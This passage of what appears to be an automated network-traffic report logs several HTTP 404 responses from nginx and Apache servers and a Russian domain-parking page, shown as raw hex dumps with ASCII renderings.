20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 17 Nov 2023 18:27:54 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 17 Nov 2023 18:27:57 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:29:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:29:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:29:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 74 55 14 1a 81 ef 0f 4c df 73 1d 4f d5 2d 5d 57 c7 97 be 08 94 db 28 85 d1 d8 55 61 4f 29 4c 33 50 1d 47 36 4a d2 75 4b a2 17 a8 8d 5c 58 16 ce 90 a3 c8 37 ed 30 c4 14 93 fe 0e 96 91 b5 de 90 90 cb f7 4c fc 59 5d 2e 09 d2 1f d4 35 90 5d 65 5d 31 b8 61 b3 1e da 81 33 8c 9a d6 b1 fa d1 f5 f3 17 ce 5d 3a b7 7e cc 3a b2 e5 78 1d 7f cb 8c 02 69 f7 d7 b8 c1 45 5f 76 44 43 6c 8c 3c 3b 72 7c af 52 bd 7a 7d e5 88 75 ec f2 e5 e6 31 ab 6e a5 83 a4 83 09 2c 0e cd 1b a5 f9 c3 54 ca d6 40 7a ce 86 0a 23 f3 dd b0 5c 2d a1 bd 0a 02 3f 38 64 87 9a 58 46 9f 30 b0 1b a5 e2 40 b0 4a 66 e5 51 b4 c1 56 7e 66 b9 08 32 30 1c 69 24 3c b4 6c b3 9d 8a f2 cd d4 1d 24 a3 a5 f1 da f6 3b e3 0c d9 6d 63 08 5b 09 fd af 45 e6 6b a5 68 e5 32 c6 ed e4 53 ab dd 6d b9 4e b7 17 01 0f 34 96 0a 8a e3 70 e3 56 2b ad a0 21 a7 4a f4 e8 29 e6 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 60 a2 f8 eb 78 2f 7e 14 ef c4 8f 45 fc 6d 7c 27 79 1f 1f ef c5 bb c9 07 c9 0d 7c de c5 ef 5e bc 1d df a1 ea ed 25 af 1d 0e 57 ea f0 46 ed b7 6d 83 50 9b 61 b5 17 45 c3 f0 ac 65 c1 f9 4c b8 af 76 06 cf df f0 5d d7 df 12 9e ef 0f 15 50 82 0f f0 03 a0 45 05 c0 b3 0c ba e4 d4 ad 36 bc be 0f 61 fe 46 b3 9b c9 fb c9 cd ba 25 9b 75 0b eb 68 d6 67 16 d3 55 ad 56 ea e9 c6 56 20 87 43 0c 9a 2a 78 b6 bc c5 be d8 82 2f 80 16 16 36 62 b3 f4 fc 30 02 89 18 61 24 23 c7 86 01 66 66 9d d2 b5 91 ce 4f 76 5a 9e 68 63 c6 22 06 53 43 69 01 6f f4 96 9b f5 e1 e2 be 1d a5 51 0c 57 7d 76 5b d5 db 41 33 de d5 e6 8a 9f 90 1d e3 27 6c db 07 fb ac 39 a5 f2 e1 a2 65 b7 47 51 e4 7b 61 a6 6f ac bb 00 02 5d 09 29 f5 07 18 c1 f5 83 16 5b 59 79 36 41 2d ad 08 9d f7 54 0b f6 1f 48 97 8d 91 ea 34 ef 9f eb 2f 6d cf 86 01 27 17 86 18 ca 4e 07 66 6a b9 84 9c 59 e4 11 41 6b f4 59 5b 3d df 09 ad 55 bb a7 ec 7e 63 a9 c3 81 62 1e 7f 2f c9 c1 70 05 7d 5a a1 3f 0a 6c d5 c8 44 20 66 2e 35 7f 43 a3 10 12 45 71 bd e4 38 45 f9 99 ba 0b fe 78 f0 7a 3a fe 40 3a 39 c1 67 4e 53 10 5d 37 b0 3c b5 65 ad 8e a2 41 26 d9 5c e9 a9 9e 62 cc 68 90 49 be 44 45 36 56 25 9d ae d7 08 a1 28 af d3 c2 58 07 2f 34 fe 07 80 f1 df 78 47 24 1f c5 7b c9 27 c9 4d 11 df cf 78 e1 68 c1 15 c3 a1 f4 e6 60 7
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 17 Nov 2023 18:29:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 36 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 65 74 73 2d 72 6f 6f 6d 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 17 Nov 2023 18:29:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
